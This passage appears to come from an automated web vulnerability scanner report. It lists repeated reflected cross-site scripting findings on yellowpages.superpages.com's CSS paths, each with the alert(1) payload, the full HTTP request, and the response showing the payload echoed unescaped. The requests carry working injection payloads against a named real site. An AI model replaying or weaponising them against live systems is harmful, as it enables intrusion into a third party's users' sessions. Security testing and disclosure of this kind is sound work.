Path:   /common/css/sendtom.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c75f4"-alert(1)-"02b021d68ca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/cssc75f4"-alert(1)-"02b021d68ca/sendtom.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/cssc75f4&quot;-alert(1)-&quot;02b021d68ca/sendtom.css
Server: Unspecified
Set-Cookie: JSESSIONID=961E21ED8472E86EF4F8EBD9ECEB24D4; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:24 GMT
Cache-Control: private
Content-Length: 36083


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/cssc75f4"-alert(1)-"02b021d68ca/sendtom.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.575. http://yellowpages.superpages.com/common/css/sendtom.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/sendtom.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec1e7"-alert(1)-"03bc909001e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/css/sendtom.cssec1e7"-alert(1)-"03bc909001e HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/css/sendtom.cssec1e7&quot;-alert(1)-&quot;03bc909001e
Server: Unspecified
Set-Cookie: JSESSIONID=89100A70CAE7838057FA2B0BF2BD7136; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:30 GMT
Cache-Control: private
Content-Length: 36083


                       <!--
       
       -->


                                   
...[SNIP]...
llowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/css/sendtom.cssec1e7"-alert(1)-"03bc909001e?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.576. http://yellowpages.superpages.com/common/css/spcore.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/spcore.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0c20"-alert(1)-"e4243f6ac8f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /commond0c20"-alert(1)-"e4243f6ac8f/css/spcore.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /commond0c20&quot;-alert(1)-&quot;e4243f6ac8f/css/spcore.css
Server: Unspecified
Set-Cookie: JSESSIONID=AC90724B3D6058EB845DA1C9B8F4C038; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:43 GMT
Cache-Control: private
Content-Length: 36081


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/commond0c20"-alert(1)-"e4243f6ac8f/css/spcore.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.577. http://yellowpages.superpages.com/common/css/spcore.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/spcore.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8cb3"-alert(1)-"ad160d53bf0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/csse8cb3"-alert(1)-"ad160d53bf0/spcore.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/csse8cb3&quot;-alert(1)-&quot;ad160d53bf0/spcore.css
Server: Unspecified
Set-Cookie: JSESSIONID=A653C00D1D509E4F913800C0855B5E3D; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:53 GMT
Cache-Control: private
Content-Length: 36081


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/csse8cb3"-alert(1)-"ad160d53bf0/spcore.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.578. http://yellowpages.superpages.com/common/css/spcore.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/spcore.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4fc04"-alert(1)-"230ea56f1b4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/css/spcore.css4fc04"-alert(1)-"230ea56f1b4 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/css/spcore.css4fc04&quot;-alert(1)-&quot;230ea56f1b4
Server: Unspecified
Set-Cookie: JSESSIONID=F118099836FFFF9E6242ECE63F34CE56; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:00 GMT
Cache-Control: private
Content-Length: 36081


                       <!--
       
       -->


                                   
...[SNIP]...
ellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/css/spcore.css4fc04"-alert(1)-"230ea56f1b4?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.579. http://yellowpages.superpages.com/common/css/spflyouts.1.0.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/spflyouts.1.0.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97191"-alert(1)-"a26cfc23980 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common97191"-alert(1)-"a26cfc23980/css/spflyouts.1.0.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common97191&quot;-alert(1)-&quot;a26cfc23980/css/spflyouts.1.0.css
Server: Unspecified
Set-Cookie: JSESSIONID=EA759A48641FB029323258B469F2D696; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:59 GMT
Cache-Control: private
Content-Length: 36095


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common97191"-alert(1)-"a26cfc23980/css/spflyouts.1.0.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.580. http://yellowpages.superpages.com/common/css/spflyouts.1.0.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/spflyouts.1.0.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e3da"-alert(1)-"acb1d78ef25 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/css6e3da"-alert(1)-"acb1d78ef25/spflyouts.1.0.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/css6e3da&quot;-alert(1)-&quot;acb1d78ef25/spflyouts.1.0.css
Server: Unspecified
Set-Cookie: JSESSIONID=D52748B2F7AE3B38F917957D6A181889; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:06 GMT
Cache-Control: private
Content-Length: 36095


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/css6e3da"-alert(1)-"acb1d78ef25/spflyouts.1.0.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.581. http://yellowpages.superpages.com/common/css/spflyouts.1.0.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/spflyouts.1.0.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa201"-alert(1)-"737b17cce6d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/css/spflyouts.1.0.cssfa201"-alert(1)-"737b17cce6d HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/css/spflyouts.1.0.cssfa201&quot;-alert(1)-&quot;737b17cce6d
Server: Unspecified
Set-Cookie: JSESSIONID=69DC6403BFC862BADBDF43AFF539343B; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:14 GMT
Cache-Control: private
Content-Length: 36095


                       <!--
       
       -->


                                   
...[SNIP]...
ges.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/css/spflyouts.1.0.cssfa201"-alert(1)-"737b17cce6d?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.582. http://yellowpages.superpages.com/common/css/sppromoads.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/sppromoads.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53209"-alert(1)-"19f62aec85 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common53209"-alert(1)-"19f62aec85/css/sppromoads.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common53209&quot;-alert(1)-&quot;19f62aec85/css/sppromoads.css
Server: Unspecified
Set-Cookie: JSESSIONID=8E8F60E769287FC4C64A66BDCBA5CF11; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:45 GMT
Cache-Control: private
Content-Length: 36087


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common53209"-alert(1)-"19f62aec85/css/sppromoads.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.583. http://yellowpages.superpages.com/common/css/sppromoads.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/sppromoads.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c53f7"-alert(1)-"f0b92738dcd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/cssc53f7"-alert(1)-"f0b92738dcd/sppromoads.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/cssc53f7&quot;-alert(1)-&quot;f0b92738dcd/sppromoads.css
Server: Unspecified
Set-Cookie: JSESSIONID=85975BEBF5BE4BEC0876302A028AEC4B; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:54 GMT
Cache-Control: private
Content-Length: 36089


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/cssc53f7"-alert(1)-"f0b92738dcd/sppromoads.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.584. http://yellowpages.superpages.com/common/css/sppromoads.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/sppromoads.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6905"-alert(1)-"628f1c95393 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/css/sppromoads.cssc6905"-alert(1)-"628f1c95393 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/css/sppromoads.cssc6905&quot;-alert(1)-&quot;628f1c95393
Server: Unspecified
Set-Cookie: JSESSIONID=D69C3C5699393247BF29AC6893B9AA7D; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:01 GMT
Cache-Control: private
Content-Length: 36089


                       <!--
       
       -->


                                   
...[SNIP]...
wpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/css/sppromoads.cssc6905"-alert(1)-"628f1c95393?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.585. http://yellowpages.superpages.com/common/css/structure.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/structure.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4770c"-alert(1)-"4414bf7cc3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common4770c"-alert(1)-"4414bf7cc3/css/structure.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common4770c&quot;-alert(1)-&quot;4414bf7cc3/css/structure.css
Server: Unspecified
Set-Cookie: JSESSIONID=B3A85C1803D19FCD2490D1349686EC11; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:26 GMT
Cache-Control: private
Content-Length: 36085


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common4770c"-alert(1)-"4414bf7cc3/css/structure.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.586. http://yellowpages.superpages.com/common/css/structure.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/structure.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dee76"-alert(1)-"0d4decbeb19 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/cssdee76"-alert(1)-"0d4decbeb19/structure.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/cssdee76&quot;-alert(1)-&quot;0d4decbeb19/structure.css
Server: Unspecified
Set-Cookie: JSESSIONID=ABCC92F3BBD93E038D6DE273AA54967F; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:33 GMT
Cache-Control: private
Content-Length: 36087


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/cssdee76"-alert(1)-"0d4decbeb19/structure.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.587. http://yellowpages.superpages.com/common/css/structure.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/structure.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1738"-alert(1)-"099ed66255a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/css/structure.cssb1738"-alert(1)-"099ed66255a HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/css/structure.cssb1738&quot;-alert(1)-&quot;099ed66255a
Server: Unspecified
Set-Cookie: JSESSIONID=E9374EE61141A9229E321BCE1DD67FDA; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:41 GMT
Cache-Control: private
Content-Length: 36087


                       <!--
       
       -->


                                   
...[SNIP]...
owpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/css/structure.cssb1738"-alert(1)-"099ed66255a?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.588. http://yellowpages.superpages.com/common/css/styles.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/styles.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 992a6"-alert(1)-"25f8f156e7b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common992a6"-alert(1)-"25f8f156e7b/css/styles.css HTTP/1.1
